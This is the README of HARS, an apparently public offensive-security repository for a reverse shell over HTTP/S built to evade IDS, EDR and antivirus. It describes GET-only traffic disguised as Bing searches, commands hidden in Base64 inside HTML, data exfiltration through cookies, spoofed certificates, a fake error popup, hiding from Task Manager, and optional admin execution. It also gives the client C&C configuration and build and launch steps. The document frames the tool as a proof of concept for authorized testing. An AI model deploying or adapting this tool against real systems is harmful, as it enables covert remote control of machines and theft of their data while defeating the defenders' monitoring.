Repository files navigation

In an age where advanced detection systems such as IDS, IPS, EDR, AV, and firewalls dominate corporate networks, evading them during offensive security assessments is a challenge. Most reverse shells leverage TCP tunnels (L4), which are now routinely analyzed and flagged.

This project presents an innovative solution: a completely asynchronous reverse shell over HTTP/S that blends into normal web traffic by mimicking legitimate user behavior.

Unlike traditional reverse shells, it only usesGET requests, appears asnormal web queries, and can optionally run overHTTPS with a fake legitimate certificate, minimizing the chances of detection.

1. The client app is executed on the target machine.
2. The client initiates the connection with the server.
3. The server accepts the connection - then :

The client queries the server until it gets instructions.
The attacker provides instructions to the server.
When a command is defined, the client executes it and returns the result.
And so on, until the attacker decides to end the session.

This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Make sure you check with your local laws before running this tool.

Today, as a poc, the following functionalities are implemented:

• Stealthy GET-only communication.
• Mimics Bing.com traffic.
• Base64-encoded commands in HTML.
• Exfiltration via HTTP cookies.
• Optional HTTPS with spoofed cert.
• Random delays and templates per request.
• Single PowerShell process reuse to evade EDR.
• Compatible with CMD & PowerShell commands.
• Optional fake error message popup.
• Hidden from Task Manager.
• Optional admin-level execution.

Client side

Server side

1. OpenHARS.sln in Visual Studio.
2. EditConfig.cs to match your environment:

classConfig{/* Behavior */// Display a fake error msg at startuppublicstaticboolDisplayErrorMsg=true;// Title of fake error msgpublicstaticstringErrorMsgTitle="This application could not be started.";// Description of fake error msgpublicstaticstringErrorMsgDesc="Unhandled exception has occured in your application.\r\r Object {0} is not valid.";// Min delay between the client callspublicstaticintMinDelay=2;// Max delay between the client callspublicstaticintMaxDelay=5;// Fake uri requested - Warning : it must begin with "search" (or need a change on server side)publicstaticstringUrl="search?q=search+something&qs=n&form=QBRE&cvid=";/* Listener */// Hostname/IP of C&C serverpublicstaticstringServer="https://127.0.0.1";// Listening port of C&C serverpublicstaticstringPort="443";// Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxypublicstaticboolAllowInsecureCertificate=true;}

Optional: EditHARS.manifest to adjust privilege level.

requestedExecutionLevel can be set toasInvoker,highestAvailable, orrequireAdministrator.

Projet properties

Here you can customize the assembly information and an icon for the file.

Note : Target .NET framework version is set to 4.6 which is available by default in Windows 10.
For Windows 7, choose .NET 3.5 if you don't want to have to install missing features.

Build the project from Visual Studio.The client should be generated inHttp Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release folder.

Done!

1. EditHARS_Server.py inHARS_Server/www/ to customize port or certificate path.

PORT=443CERT_FILE='../server.pem'

2. Run with:

python HARS_Server.py

-HTTP Logs are located inHttp Asynchronous Reverse Shell\HARS_Server\logs\
-You can add your own templates (any html page) inHttp Asynchronous Reverse Shell\HARS_Server\templates

• RSA NetWitness Detection Review by Lee Kirkpatric
• Deep Dive Analysis by Nasreddine Bencherchali

@onSec-fr